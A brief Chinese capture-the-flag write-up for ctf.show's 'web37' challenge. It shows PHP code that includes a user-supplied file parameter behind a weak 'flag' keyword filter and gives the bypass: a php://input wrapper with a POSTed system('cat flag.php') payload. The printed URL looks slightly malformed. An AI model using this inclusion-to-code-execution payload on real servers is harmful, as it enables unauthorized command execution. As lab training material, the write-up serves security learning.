跳到主要内容

web37

error_reporting(0);
if(isset($_GET['c'])){
$c = $_GET['c'];
if(!preg_match("/flag/i", $c)){
include($c);
echo $flag;

}

}else{
highlight_file(__FILE__);
}

那么直接 include flag.php 即可

但是由于有 flag 关键词拦截,可以考虑通过伪协议传入

https://fce6f17c-9649-48f2-8533-e6e13d87dfe3.challenge.ctf.show/c=php:input

POST: <?php system("cat flag.php"); ?>

img